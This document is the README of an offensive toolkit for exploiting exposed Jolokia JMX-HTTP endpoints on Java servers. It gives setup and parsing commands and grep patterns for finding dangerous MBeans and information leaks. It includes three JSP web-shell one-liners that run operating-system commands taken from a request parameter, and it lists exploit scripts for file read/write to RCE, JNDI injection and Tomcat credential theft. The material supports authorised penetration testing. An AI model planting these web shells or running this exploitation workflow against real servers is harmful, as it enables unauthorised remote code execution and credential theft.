Jolokia Exploitation Toolkit (JET) helps exploitation of exposed jolokia endpoints.

Jolokia is a protocol bridge that enables users to interact with MBeans (JMB) through HTTP. This endpoint "exposed JMX features" which are often dangerous, this implies that /jolokia should never be exposed, and if used internally (loopback), should be protected by an authentication mechanism.

Doc says... :)

Jolokia is a JMX-HTTP bridge giving an alternative to JSR-160 connectors. It is an agent based approach with support for many platforms. In addition to basic JMX operations it enhances JMX remoting with unique features like bulk requests and fine grained security policies.

1. Java projects
2. /jolokia
3. /actuator/jolokia
4. ???

You can either startup a tomcat server (docker || docker-compose) and install the jolokia war,
Or run docker run --rm -it --net=host bodsch/docker-jolokia and go with the flow ~

# Setup with virtualenv virtualenv -p python3 .venv && source .venv/bin/activate pip install -r requirements.txt # Use jolokia-parser.py with remote url python jolokia-parser.py http://127.0.0.1/jolokia | tee jolokia-parsed.lst # Or use jolokia-parser.py with local json curl http://127.0.0.1/jolokia/list -o jolokia-list.json python jolokia-parser.py jolokia-list.json | sed 's#^/jolokia#http://127.0.0.1/jolokia#g' | tee jolokia-parsed.lst # Quickly find the cool MBeans grep -iP 'compilerDirectivesAdd|name=AccessLogValve,type=Valve/pattern|createStandardHost|jfrStart|vmLog|read/Users:database=UserDatabase|MBeanFactory|reloadByURL|jvmtiAgentLoad|environmentManager|log4j2' jolokia-parsed.lst # Quickly find information leaks, paths, user, etc grep -iP 'Runtime/(BootClassPath|ClassPath|InputArguments|LibraryPath|SystemProperties)' jolokia-parsed.lst

The expected output in jolokia-parsed.lst is the following:

http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor [+] CLASS : javax.management.MBeanServerDelegate [+] DESC : Represents the MBean server from the management point of view. [+] DESC : getRecordingOptions // returns javax.management.openmbean.TabularData http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/getRecordingOptions/$long [+] DESC : takeSnapshot // returns long http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/takeSnapshot [+] DESC : closeRecording // returns void http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/closeRecording/$long [+] DESC : newRecording // returns long http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/newRecording [+] DESC : setRecordingSettings // returns void http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/setRecordingSettings/$long/$javax.management.openmbean.TabularData [+] DESC : openStream // returns long http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/openStream/$long/$javax.management.openmbean.TabularData [+] DESC : cloneRecording // returns long http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/cloneRecording/$long/$boolean [+] DESC : setRecordingOptions // returns void http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/setRecordingOptions/$long/$javax.management.openmbean.TabularData [+] DESC : copyTo // returns void http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/copyTo/$long/$java.lang.String [+] DESC : startRecording // returns void http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/startRecording/$long [...] 

🚧 ADD AUTH TO YOUR JSP 🚧

<% Runtime.getRuntime().exec(new String[] { "sh", "-c", "cmd" }); %> <%=Runtime.getRuntime().exec(request.getParameter(String.valueOf(42))).getInputStream()%> <%= new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("RESULT").next() %>

• @TheLaluka
  • jolokia-parser.py | Convert /jolokia/list or json blob to human-readable urls
  • exploits/file-write-to-rce-vhost-jfr.md | File read and file write to RCE by deploying a vhost with MBeanFactory/createStandardHost and DiagnosticCommand/jfrStart
  • exploits/file-read-compilerdirectivesadd.md | File read with DiagnosticCommand/compilerDirectivesAdd
  • exploits/file-write-to-rce-vmLog.md | File write to RCE with DiagnosticCommand/vmLog
• @Coiffeur0x90
  • exploits/file-write-to-rce-valve.py | File write with Catalina:host=localhost,name=AccessLogValve (exploit)
  • exploits/file-write-to-rce-valve.md | File write with Catalina:host=localhost,name=AccessLogValve (article)
  • exploits/info-leak-tomcat-creds.py | Tomcat credentials leak with Users:database=UserDatabase,type=UserDatabase
• @mpgn_x64
  • exploits/jndi-logback.md | XXE to RCE with ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL
• RicterZ
  • exploits/jndi-injection-MBeanFactory.py | RCE with JNDI Injection (Tomcat EL) with MBeanFactory
• @lely__
  • exploits/jndi-ldap-target.md | RMI injection with jolokia proxy url handling
• @JJaaskela
  • exploits/file-write-to-rce-jar-load-jvmtiAgentLoad.py | jvmtiAgentLoad to RCE with JAR or SO/DLL load
• @mbadanoiu
  • exploits/log4jolokia.py | Log4J configuration reload to file read/write & RCE with tricks!
• You SHOULD be here? Let me know and I'll fix that!

• https://jolokia.org/
• https://thinkloveshare.com/hacking/shells_with_jolokia_exploitation_toolkit/
• https://thinkloveshare.com/en/hacking/ssrf_to_rce_with_jolokia_and_mbeans/
• https://therealcoiffeur.github.io/c11011
• https://github.com/mpgn/Spring-Boot-Actuator-Exploit
• https://www.cvedetails.com/vulnerability-list/vendor_id-14175/Jolokia.html
• https://ricterz.me/posts/2019-03-06-yet-another-way-to-exploit-spring-boot-actuators-via-jolokia.txt
• https://blog.gdssecurity.com/labs/2018/4/18/jolokia-vulnerabilities-rce-xss.html
• https://blog.it-securityguard.com/how-i-made-more-than-30k-with-jolokia-cves/
• https://github.com/mbadanoiu/jvmtiAgentLoad-Exploit
• https://github.com/mbadanoiu/log4jolokia
• https://blog.pyn3rd.com/2022/11/15/A-New-Way-of-Jolokia-Remote-Code-Execution/